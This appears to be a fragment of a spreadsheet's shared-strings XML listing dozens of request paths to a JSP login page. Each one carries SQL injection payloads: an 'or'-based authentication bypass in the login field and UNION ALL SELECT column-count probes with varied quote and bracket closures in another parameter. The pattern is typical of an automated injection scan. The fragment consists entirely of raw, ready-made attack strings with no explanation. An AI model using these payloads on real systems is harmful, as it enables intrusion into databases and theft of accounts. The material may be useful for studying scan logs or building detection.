    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547,9547#and'whpc'='whpc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283,9283#and'jmps'='jmps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800,2800#and('aeia'like'aeia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418,7418#and('jrbh'like'jrbh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698,9698#and('yzac'like'yzac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601,9601#and('vhiu'like'vhiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944,2944#and('uzvj'like'uzvj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400,5400#and('impx'like'impx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477,8477#and('gpih'like'gpih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408,8408#and('fklz'like'fklz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457,1457#and('kvxu'like'kvxu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879#and('upbo'like'upbo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371,8371#and(('aavv'like'aavv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977,977#and(('kxee'like'kxee&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141,8141#and(('ynud'like'ynud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233,4233#and(('cxhc'like'cxhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944,3944#and(('oouv'like'oouv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504,6504#and(('gggl'like'gggl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105,1105#and(('hvry'like'hvry&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944,1944#and(('hkvg'like'hkvg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282,3282#and(('abpa'like'abpa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570,4570#and(('abwt'like'abwt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063,9063#and((('llur'like'llur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045,8045#and((('gdcu'like'gdcu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193#and((('diwu'like'diwu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330,5330#and((('nllp'like'nllp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10#and((('msch'like'msch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650,2650#and((('fulh'like'fulh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652,2652#and((('agxp'like'agxp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612,4612#and((('zclm'like'zclm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455,4455#and((('cxog'like'cxog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689,5689#and((('zrkp'like'zrkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973,3973#and'jtwg'like'jtwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184,9184#and'nfxe'like'nfxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225,8225#and'kwvz'like'kwvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680,8680#and'zcbn'like'zcbn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312,2312#and'xmaq'like'xmaq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348,6348#and'bufa'like'bufa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050,2050#and'wbfs'like'wbfs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630,3630#and'qjti'like'qjti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727,727#and'cpwf'like'cpwf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279,4279#and'kiif'like'kiif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466,5466#and("xtku"="xtku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196,7196#and("dwgf"="dwgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816,8816#and("coce"="coce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292,9292#and("yvkh"="yvkh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670,8670#and("xwzo"="xwzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724,3724#and("sqax"="sqax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108#and("mrgj"="mrgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835#and("iexe"="iexe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917,2917#and("omph"="omph&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918,3918#and("jror"="jror&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638,2638#and(("ritp"="ritp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578,3578#and(("frog"="frog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861,5861#and(("nnsf"="nnsf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586,7586#and(("hakv"="hakv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171,5171#and(("zfgt"="zfgt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968,9968#and(("kies"="kies&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584,5584#and(("mwxy"="mwxy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335,2335#and(("hhwb"="hhwb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000,5000#and(("vejs"="vejs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549#and(("wevo"="wevo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031,6031#and((("vdjc"="vdjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010,9010#and((("etgp"="etgp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899,8899#and((("rrly"="rrly&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255,5255#and((("jwky"="jwky&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879#and((("gnnr"="gnnr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124,3124#and((("worw"="worw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695,7695#and((("uejy"="uejy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894,8894#and((("rumv"="rumv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672,9672#and((("qish"="qish&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965,2965#and((("gvyh"="gvyh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331,9331#and"xcxb"="xcxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157,4157#and"acwj"="acwj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785,9785#and"nuyh"="nuyh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888,8888#and"pknk"="pknk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906,2906#and"voaf"="voaf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354,6354#and"hdgn"="hdgn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839,3839#and"asxw"="asxw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060,7060#and"kqlj"="kqlj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822,6822#and"hlqt"="hlqt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812,6812#and"rkgk"="rkgk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749,4749#and("qzsv"like"qzsv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374,9374#and("temv"like"temv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811,8811#and("dhxd"like"dhxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436,9436#and("iwfl"like"iwfl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772,4772#and("jeym"like"jeym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491,7491#and("uebw"like"uebw&amp;modo=entrar</t>
  </si>
  <si>
